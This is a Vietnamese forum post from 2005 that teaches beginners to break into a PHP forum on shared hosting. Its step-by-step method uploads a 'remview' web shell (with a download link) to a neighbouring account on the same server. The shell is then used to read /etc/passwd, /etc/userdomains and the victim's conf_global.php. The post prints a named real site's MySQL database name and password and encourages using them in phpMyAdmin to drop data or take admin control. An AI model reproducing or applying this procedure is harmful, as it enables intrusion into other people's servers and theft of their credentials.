Tác giả: Kid_ktv4
Chào các bạn , hôm nay mình xin giới thiệu 1 cách hack forum , theo tôi nghĩ nó ở mức nguy hiểm cao , hầu hết các diễn đàn php đều có cơ sở dữ SQL và nội dung bài viết này làm cách nào là đọc file config.php , trong khi họ đã chmod để lấy pass mySQL của victim , sữ dụng phpmyadmin để drop hay đoạt quyền admin diễn đàn . Nếu bạn là 1 hacker tôi nói đến đây là kết thúc bài viết , tôi nghĩ bạn đủ thông minh để hiểu và không nên mất thời gian xem những cái mà mình đã biết rồi . Còn ngược lại bạn chưa hiểu thì chúng ta tiếp tục sang bước tiếp theo nhé .bài viết này dành cho newbie Okie
Ở đây tôi lấy 1 site vd www.forums.ngoisaonho.info site này mới thành lập chưa có thành viên nên mức độ ảnh hưởng sẽ không cao , cho việc tôi dùng nó để miêu tả 1 bài viết . Bạn dùng 1 công cụ để kiểm tra victim của bạn mua host ở đâu www.checkdomain.com bạn có thể dùng nó ! chúng ta tiếp tục nhé
Bước 1 : Up load backdoor lên host của bạn cùng sever lên host victim . Tôi dùng remview bạn dùng cái gì thì tuỳ
copy đoạn code remview.php
down tại
http://www.ktv4vn.com/rem.zipBước 2
okie ! up con backdoor này lên host của bạn và chạy nó với link
http://www.localhost.com/remview.php Có 1 khó khăn cho tôi khi host của victim chmod khả chuẩn khiến tôi không thể view host . Tôi phải đi đường vòng sữ dụng chức năng Shell commands
okie trong Shell commands bạn cho run lệnh
CODE
cat /etc/passwd;
Tốt rồi
CODE
ngoisaon:x:33217:33218::/home/ngoisaon:/usr/local/cpanel/bin/noshell
Tiếp trong shell commands bạn cho run lệnh
cat /etc/userdomains;
Tôi tìm đúng domain của victim như vậy ta có user victim là ngoisaon
CODE
ngoisaonho.info: ngoisaon
Như phần trên đã nói host victim chmod khá chuẩn nên tôi phải tiếp tục sữ dụng công cụ Shell commands để view host victim
trong Shell commands run lệnh dir với user bạn vừa tìm được như sau:
dir /home/victim/public_html/;
thu được
CODE
cgi-bin index.htm _private _vti_inf.html _vti_txt xoa
diendan music _vti_bin _vti_log wait.gif
forums postinfo.html _vti_cnf _vti_pvt welcome
Chạy tiếp lện dir để view thư mục forums
dir /home/victim/public_html/forums;
thu được
CODE
admin.php fonts MBinstall.php style_images
cache html modules uploads
cgi-bin icon_db_hack.php show.php viewsong.php
conf_global.php index.php Skin xoa
conf_mime_types.php install_templates.txt sources
css.php ipchat.php ssi.php
datamusic.sql lang ssi_templates
Cái mà tôi cần view là file conf_global.php run với lện cat như sau :
cat /home/victim/public_html/forums/conf_global.php;
CODE
$INFO['sql_database'] = 'ngoisaon_Forums';
$INFO['sql_driver'] = 'mySQL';
$INFO['sql_host'] = 'localhost';
$INFO['sql_pass'] = 'HANOIMUATHU';
Đến đây bạn đã lấy thấy được user : ngoisaon_Forums và pass là HANOIMUATHU , việc còn lại là dùng nó để vào phpmyadmin của victim , bạn vào phpmyadmin sẽ có rất nhiều cho vui , nên nhớ rằng để người khác vào phpmyadmin của mình điều này còn tệ hơn việc victim bị hack pass admin trong forum , bạn có thể vào phpmyadmin của victim bằng nhiều cách có thể tìm link của victim hay setup phpmyadmin ở host bạn hay sữ dụng 1 tool nào đó để hổ trợ bạn làm việc này vì tính chất nguy hiểm mình xin ngừng bút tại đây chừa 1 chút khoảng chống để bạn tự tìm hiểu và làm cái gì đó cao siêu hơn nữa , chúc hack vui vẻ thân kid_ktv4 tái bút
VnVista Forum > Góc kiến thức > Thiết kế & phát triển website > Invision Power Board modifications + skins
Sep 14 2005, 11:17 PM
